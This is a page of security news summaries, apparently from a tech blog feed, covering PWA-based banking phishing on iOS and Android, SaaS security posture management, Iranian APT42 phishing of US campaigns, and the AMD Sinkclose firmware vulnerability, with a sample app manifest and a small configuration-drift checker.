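The point of the sketch is only that nothing about the identifier ties it to the place it was read: once forwarded, the receiving end can present it as if the card were locally present.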

Android malware steals payment card data using previously unseen technique Read More »


Novel technique allows malicious apps to escape iOS and Android guardrails

NOW YOU KNOW —

Web-based apps escape iOS “Walled Garden” and Android side-loading protections.

An image illustrating a phone infected with malware

Getty Images

Phishers are using a novel technique to trick iOS and Android users into installing malicious apps that bypass safety guardrails built by both Apple and Google to prevent unauthorized apps.

Both mobile operating systems employ mechanisms designed to help users steer clear of apps that steal their personal information, passwords, or other sensitive data. iOS bars the installation of all apps other than those available in its App Store, an approach widely known as the Walled Garden. Android, meanwhile, is set by default to allow only apps available in Google Play. Sideloading—or the installation of apps from other markets—must be manually allowed, something Google warns against.

When native apps aren’t

Phishing campaigns making the rounds over the past nine months are using previously unseen ways to work around these protections. The objective is to trick targets into installing a malicious app that masquerades as an official one from the targets’ bank. Once installed, the malicious app steals account credentials and sends them to the attacker in real time over Telegram.

“This technique is noteworthy because it installs a phishing application from a third-party website without the user having to allow third-party app installation,” Jakub Osmani, an analyst with security firm ESET, wrote Tuesday. “For iOS users, such an action might break any ‘walled garden’ assumptions about security. On Android, this could result in the silent installation of a special kind of APK, which on further inspection even appears to be installed from the Google Play store.”

The novel method involves enticing targets to install a special type of app known as a Progressive Web App. These apps rely solely on Web standards to deliver the feel and behavior of a native app, without the restrictions that come with one. Because they build on Web standards, PWAs, as they’re abbreviated, will in theory run on any platform with a standards-compliant browser, on iOS and Android alike. Once installed, users can add PWAs to their home screen, where they bear a striking similarity to native apps.
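For context, a PWA is defined by a small Web App Manifest that the browser reads when the user adds the app to the home screen. A minimal illustrative manifest (the names and paths below are hypothetical, not taken from the campaign) shows why such an app can pass for a native one: `"display": "standalone"` removes the browser chrome entirely.

```json
{
  "name": "Example Bank",
  "short_name": "Bank",
  "start_url": "/app/",
  "display": "standalone",
  "background_color": "#ffffff",
  "theme_color": "#004a99",
  "icons": [
    { "src": "/icons/bank-192.png", "sizes": "192x192", "type": "image/png" }
  ]
}
```

With a copied name and icon, the resulting home-screen entry is visually indistinguishable from an installed native app, which is exactly what the phishing campaigns exploit.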

While PWAs exist on both iOS and Android, Osmani’s post uses the term PWA for the iOS apps and WebAPK for the Android ones.

Installed phishing PWA (left) and real banking app (right).

ESET

Comparison between an installed phishing WebAPK (left) and real banking app (right).

ESET

The attack begins with a message sent either by text message, automated call, or through a malicious ad on Facebook or Instagram. When targets click on the link in the scam message, they open a page that looks similar to the App Store or Google Play.

Example of a malicious advertisement used in these campaigns.

ESET

Phishing landing page imitating Google Play.

ESET

ESET’s Osmani continued:

From here victims are asked to install a “new version” of the banking application; an example of this can be seen in Figure 2. Depending on the campaign, clicking on the install/update button launches the installation of a malicious application from the website, directly on the victim’s phone, either in the form of a WebAPK (for Android users only), or as a PWA for iOS and Android users (if the campaign is not WebAPK based). This crucial installation step bypasses traditional browser warnings of “installing unknown apps”: this is the default behavior of Chrome’s WebAPK technology, which is abused by the attackers.

Example copycat installation page.

ESET

The process is a little different for iOS users, as an animated pop-up instructs victims how to add the phishing PWA to their home screen (see Figure 3). The pop-up copies the look of native iOS prompts. In the end, even iOS users are not warned about adding a potentially harmful app to their phone.

Figure 3. iOS pop-up instructions after clicking “Install” (credit: Michal Bláha)

ESET

After installation, victims are prompted to submit their Internet banking credentials to access their account via the new mobile banking app. All submitted information is sent to the attackers’ C&C servers.

The technique is made all the more effective because application information associated with the WebAPKs will show they were installed from Google Play and have been assigned no system privileges.

WebAPK info menu—notice the “No Permissions” at the top and “App details in store” section at the bottom.

ESET

So far, ESET is aware of the technique being used against customers of banks mostly in Czechia and less so in Hungary and Georgia. The attacks used two distinct command-and-control infrastructures, an indication that two different threat groups are using the technique.

“We expect more copycat applications to be created and distributed, since after installation it is difficult to separate the legitimate apps from the phishing ones,” Osmani said.

Novel technique allows malicious apps to escape iOS and Android guardrails Read More »


SaaS Security Posture—It’s not you, it’s me!

In business, it’s not uncommon to take a software-as-a-service (SaaS)-first approach. It makes sense—there’s no need to deal with the infrastructure, management, patching, and hardening. You just turn on the SaaS app and let it do its thing.

But there are some downsides to that approach.

The Problem with SaaS

While SaaS has many benefits, it also introduces a host of new challenges, many of which don’t get the coverage they warrant. At the top of the list of challenges is security. So, while there are some very real benefits of SaaS, it’s also important to recognize the security risk that comes with it. When we talk about SaaS security, we’re not usually talking about the security of the underlying platform, but rather how we use it.

Remember, it’s not you, it’s me!

The Shared Responsibility Model

In the terms and conditions of most SaaS platforms is the “shared responsibility model.” What it usually says is that the SaaS vendor is responsible for providing a platform that is robust, resilient, and reliable—but they don’t take responsibility for how you use and configure it. And it is in these configuration changes that the security challenge lives.

SaaS platforms often come with multiple configuration options, such as ways to share data, ways to invite external users, how users can access the platform, what parts of the platform they can use, and so on. And every configuration change, every nerd knob turned, has the potential to move the platform away from its optimum security configuration or introduce an unexpected capability. While some applications, like Microsoft 365, offer guidance on security settings, this is not true for all of them. Even if they do, how easy is that to manage when you get to 10, 20, or even 100 SaaS apps?

Too Many Apps

Do you know how many SaaS apps you have? It’s not the SaaS apps you know about that are the issue, it’s the ones you don’t. Because SaaS is so accessible, it can easily evade management. There are apps that people use but an organization may not be aware of—like the app the sales team signed up for, that thing that marketing uses, and of course, everyone wants a GenAI app to play with. But these aren’t the only ones; there are also the apps that are part of the SaaS platforms you sign up for. Yes, even the ones you know about can contain additional apps you don’t know about. This is how an average enterprise gets to more than 100 SaaS applications. How do you manage each of those? How do you ensure you know they exist and they are configured in a way that meets good security practices and protects your information? Therein lies the challenge.

Introducing SSPM

SSPM can be the answer. It is designed to integrate initially with your managed SaaS applications to provide visibility into how they are configured, where configurations present risks, and how to address them. It continually monitors them for new threats and for configuration changes that introduce risk. It will also discover unmanaged SaaS applications in use and evaluate their posture, presenting risk profiles of both the application and the SaaS vendor itself. In short, it centralizes the management and security of a SaaS estate and shows where its management and configuration present risk.
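At its core, the configuration-monitoring piece of SSPM is a comparison of live tenant settings against a security baseline. A minimal sketch in Python, using entirely hypothetical setting names rather than any vendor’s real API:

```python
# Hypothetical security baseline for a SaaS tenant; real SSPM tools map
# checks to published benchmarks, but these names are illustrative only.
BASELINE = {
    "mfa_required": True,
    "external_sharing": "blocked",
    "guest_access": False,
    "session_timeout_minutes": 60,
}

def find_drift(current: dict) -> list[str]:
    """Return a human-readable finding for each setting that deviates
    from the baseline, including baseline settings that are missing."""
    findings = []
    for key, expected in BASELINE.items():
        actual = current.get(key, "<unset>")
        if actual != expected:
            findings.append(f"{key}: expected {expected!r}, found {actual!r}")
    return findings

# A tenant that has drifted on two settings:
tenant = {
    "mfa_required": True,
    "external_sharing": "anyone_with_link",
    "guest_access": True,
    "session_timeout_minutes": 60,
}
for finding in find_drift(tenant):
    print(finding)
```

Real products add the hard parts this sketch omits: discovering which tenants exist in the first place, mapping each vendor’s proprietary settings API onto a common model, and re-running the comparison continuously rather than once.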

Overlap with CASB and DLP

There is some overlap in the market, particularly with cloud access security broker (CASB) and data loss prevention (DLP) tools. But these tools are a bit like capturing the thief as he runs down the driveway, rather than making sure the doors and windows were secured in the first place.

SSPM is yet another security tool to manage and pay for. But is it a tool we need? Well, that is up to you; however, our use of SaaS, for all the benefits it brings, has brought a new complexity and a new set of risks. We have so many more apps than we have ever had, many of them we don’t manage centrally, and they have many configuration knobs to turn. Without oversight of them all, we do run security risks.

Next Steps

SaaS security posture management (SSPM) is another entry into the growing catalog of security posture management tools. They are often easy to try out, and many offer free assessments that can give you an idea of the scale of the challenge you face. SaaS security is tricky and often does not get the coverage it deserves, so getting an idea of where you stand could be helpful.

Before you find yourself on the wrong end of a security incident and your SaaS vendor tells you it’s you, not me, it may be worth seeing what an SSPM tool can do for you. To learn more, take a look at GigaOm’s SSPM Key Criteria and Radar reports. These reports provide a comprehensive overview of the market, outline the criteria you’ll want to consider in a purchase decision, and evaluate how a number of vendors perform against those decision criteria.

If you’re not yet a GigaOm subscriber, sign up here.

SaaS Security Posture—It’s not you, it’s me! Read More »


Google’s threat team confirms Iran targeting Trump, Biden, and Harris campaigns

It is only August —

Another Big Tech firm seems to confirm Trump adviser Roger Stone was hacked.

Roger Stone, former adviser to Donald Trump’s presidential campaign, center, during the Republican National Convention (RNC) in Milwaukee on July 17, 2024.

Getty Images

Google’s Threat Analysis Group confirmed Wednesday that it observed a threat actor backed by the Iranian government targeting Google accounts associated with US presidential campaigns, in addition to stepped-up attacks on Israeli targets.

APT42, associated with Iran’s Islamic Revolutionary Guard Corps, “consistently targets high-profile users in Israel and the US,” the Threat Analysis Group (TAG) writes. The Iranian group uses hosted malware, phishing pages, malicious redirects, and other tactics to gain access to Google, Dropbox, OneDrive, and other cloud-based accounts. Google’s TAG writes that it reset accounts, sent warnings to users, and blacklisted domains associated with APT42’s phishing attempts.

Among APT42’s tools were Google Sites pages that appeared to be a petition from legitimate Jewish activists, calling on Israel to mediate its ongoing conflict with Hamas. The page was fashioned from image files, not HTML, and an ngrok redirect sent users to phishing pages when they moved to sign the petition.

A petition purporting to be from The Jewish Agency for Israel, seeking support for mediation measures—but signatures quietly redirect to phishing sites, according to Google.

Google

In the US, Google’s TAG notes that, as with the 2020 elections, APT42 is actively targeting the personal emails of “roughly a dozen individuals affiliated with President Biden and former President Trump.” TAG confirms that APT42 “successfully gained access to the personal Gmail account of a high-profile political consultant,” which may be longtime Republican operative Roger Stone, as reported by The Guardian, CNN, and The Washington Post, among others. Microsoft separately noted last week that a “former senior advisor” to the Trump campaign had his Microsoft account compromised, which Stone also confirmed.

“Today, TAG continues to observe unsuccessful attempts from APT42 to compromise the personal accounts of individuals affiliated with President Biden, Vice President Harris and former President Trump, including current and former government officials and individuals associated with the campaigns,” Google’s TAG writes.

PDFs and phishing kits target both sides

Google’s post details the ways in which APT42 targets operatives in both parties. The broad strategy is to get the target off their email and into channels like Signal, Telegram, or WhatsApp, or possibly a personal email address that may not have two-factor authentication and threat monitoring set up. By establishing trust through sending legitimate PDFs, or luring them to video meetings, APT42 can then push links that use phishing kits with “a seamless flow” to harvest credentials from Google, Hotmail, and Yahoo.

After gaining a foothold, APT42 will often work to preserve its access by generating application-specific passwords inside the account, which typically bypass multifactor tools. Google notes that its Advanced Protection Program, intended for individuals at high risk of attack, disables such measures.

Publications, including Politico, The Washington Post, and The New York Times, have reported being offered documents from the Trump campaign, potentially stemming from Iran’s phishing efforts, in an echo of Russia’s 2016 targeting of Hillary Clinton’s campaign. None of them have moved to publish stories related to the documents.

John Hultquist, with Google-owned cybersecurity firm Mandiant, told Wired’s Andy Greenberg that what looks initially like spying or political interference by Iran can easily escalate to sabotage and that both parties are equal targets. He also said that current thinking about threat vectors may need to expand.

“It’s not just a Russia problem anymore. It’s broader than that,” Hultquist said. “There are multiple teams in play. And we have to keep an eye out for all of them.”

Google’s threat team confirms Iran targeting Trump, Biden, and Harris campaigns Read More »


Almost unfixable “Sinkclose” bug affects hundreds of millions of AMD chips

Deep insecurity —

Worst-case scenario: “You basically have to throw your computer away.”

Security flaws in your computer’s firmware, the deep-seated code that loads first when you turn the machine on and controls even how its operating system boots up, have long been a target for hackers looking for a stealthy foothold. But only rarely does that kind of vulnerability appear not in the firmware of any particular computer maker, but in the chips found across hundreds of millions of PCs and servers. Now security researchers have found one such flaw that has persisted in AMD processors for decades, and that would allow malware to burrow deep enough into a computer’s memory that, in many cases, it may be easier to discard a machine than to disinfect it.

At the Defcon hacker conference, Enrique Nissim and Krzysztof Okupski, researchers from the security firm IOActive, plan to present a vulnerability in AMD chips they’re calling Sinkclose. The flaw would allow hackers to run their own code in one of the most privileged modes of an AMD processor, known as System Management Mode, designed to be reserved only for a specific, protected portion of its firmware. IOActive’s researchers warn that it affects virtually all AMD chips dating back to 2006, or possibly even earlier.

Nissim and Okupski note that exploiting the bug would require hackers to already have obtained relatively deep access to an AMD-based PC or server, but that the Sinkclose flaw would then allow them to plant their malicious code far deeper still. In fact, for any machine with one of the vulnerable AMD chips, the IOActive researchers warn that an attacker could infect the computer with malware known as a “bootkit” that evades antivirus tools and is potentially invisible to the operating system, while offering a hacker full access to tamper with the machine and surveil its activity. For systems with certain faulty configurations in how a computer maker implemented AMD’s security feature known as Platform Secure Boot—which the researchers warn encompasses the large majority of the systems they tested—a malware infection installed via Sinkclose could be harder yet to detect or remediate, they say, surviving even a reinstallation of the operating system.

“Imagine nation-state hackers or whoever wants to persist on your system. Even if you wipe your drive clean, it’s still going to be there,” says Okupski. “It’s going to be nearly undetectable and nearly unpatchable.” Only opening a computer’s case, physically connecting a hardware-based programming tool known as an SPI flash programmer directly to a certain portion of its memory chips, and meticulously scouring the memory would allow the malware to be removed, Okupski says.

Nissim sums up that worst-case scenario in more practical terms: “You basically have to throw your computer away.”

In a statement shared with WIRED, AMD acknowledged IOActive’s findings, thanked the researchers for their work, and noted that it has “released mitigation options for its AMD EPYC datacenter products and AMD Ryzen PC products, with mitigations for AMD embedded products coming soon.” (The term “embedded,” in this case, refers to AMD chips found in systems such as industrial devices and cars.) For its EPYC processors designed for use in data-center servers, specifically, the company noted that it released patches earlier this year. AMD declined to answer questions in advance about how it intends to fix the Sinkclose vulnerability, or for exactly which devices and when, but it pointed to a full list of affected products that can be found on its website’s security bulletin page.

Almost unfixable “Sinkclose” bug affects hundreds of millions of AMD chips Read More »